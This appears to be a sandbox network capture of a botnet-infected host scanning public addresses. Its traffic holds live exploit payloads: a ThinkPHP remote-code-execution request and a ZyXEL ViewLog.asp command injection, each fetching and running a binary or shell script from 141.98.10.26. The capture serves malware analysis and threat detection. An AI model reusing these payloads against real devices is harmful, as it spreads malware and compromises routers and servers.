Nov 22, 2023 08:38:35.620779991 CET	5572	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:35.836116076 CET	5578	IN	HTTP/1.0 302 Moved Temporarily Location: https:///index.php?s=/index/ Server: BigIP Connection: close Content-Length: 0
Nov 22, 2023 08:38:38.835145950 CET	5922	IN	HTTP/1.0 302 Moved Temporarily Location: https:///index.php?s=/index/ Server: BigIP Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
251	192.168.2.23	51698	95.85.214.113	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.641495943 CET	5573	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:35.891510010 CET	5579	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:35 GMT Content-Type: text/html Content-Length: 150 Connection: close Server: Bor4Web HTTP gateway Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
252	192.168.2.23	48762	94.122.64.68	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.813786030 CET	5576	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
253	192.168.2.23	52006	95.101.19.175	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.817034960 CET	5577	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:36.019320011 CET	5581	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:35 GMT Date: Wed, 22 Nov 2023 07:38:35 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 37 37 35 37 62 35 63 26 23 34 36 3b 31 37 30 30 36 33 38 37 31 35 26 23 34 36 3b 32 38 34 66 63 65 32 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a7757b5c.1700638715.284fce21</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
254	192.168.2.23	34374	95.33.49.147	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.834742069 CET	5577	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:36.051995039 CET	5583	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="." Access-Control-Allow-Credentials: true Content-Type: text/html Content-Length: 125 X-XSS-Protection: 1; mode=block X-Frame-Options: deny X-Content-Type-Options: nosniff Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 65 72 72 6f 72 63 6f 64 65 3e 34 30 31 3c 2f 65 72 72 6f 72 63 6f 64 65 3e 20 3c 65 72 72 6f 72 64 65 74 61 69 6c 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 65 72 72 6f 72 64 65 74 61 69 6c 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>error</title></head><body><errorcode>401</errorcode> <errordetail>Unauthorized</errordetail></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
255	192.168.2.23	48694	95.103.87.191	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.843071938 CET	5578	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:36.073375940 CET	5583	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: RomPager/4.07 UPnP/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
256	192.168.2.23	32920	94.123.184.180	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.287563086 CET	5865	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
257	192.168.2.23	56602	31.200.5.115	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.287626028 CET	5866	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
258	192.168.2.23	38940	94.24.241.238	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.294420004 CET	5867	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
259	192.168.2.23	57394	88.221.247.212	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.467008114 CET	5902	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:38.848901987 CET	5924	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Wed, 22 Nov 2023 07:38:38 GMT Date: Wed, 22 Nov 2023 07:38:38 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 36 39 62 32 35 63 34 26 23 34 36 3b 31 37 30 30 36 33 38 37 31 38 26 23 34 36 3b 63 33 66 38 37 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.869b25c4.1700638718.c3f878</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
260	192.168.2.23	41694	88.208.215.246	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.643857002 CET	5916	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:38.820717096 CET	5922	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:38 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
261	192.168.2.23	35954	88.198.130.88	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.655456066 CET	5917	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:38.844058990 CET	5923	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:38 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
262	192.168.2.23	40646	62.72.1.55	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.661216021 CET	5918	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
263	192.168.2.23	35972	31.136.165.210	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.695271015 CET	5918	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:39.277014017 CET	5930	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:40.396986961 CET	6082	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:42.700527906 CET	6348	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:47.307910919 CET	6930	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.266617060 CET	8086	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:15.719986916 CET	10471	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:52.578716993 CET	14840	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
264	192.168.2.23	42448	62.171.149.239	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.701633930 CET	5919	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:38.896753073 CET	5926	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Wed, 22 Nov 2023 07:38:38 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
265	192.168.2.23	37568	94.73.64.46	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:38.702855110 CET	5920	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
266	192.168.2.23	36624	112.126.169.117	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.122241020 CET	5929	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:39.434376955 CET	6002	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:33:51 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
267	192.168.2.23	50242	112.74.188.186	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.142494917 CET	5930	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
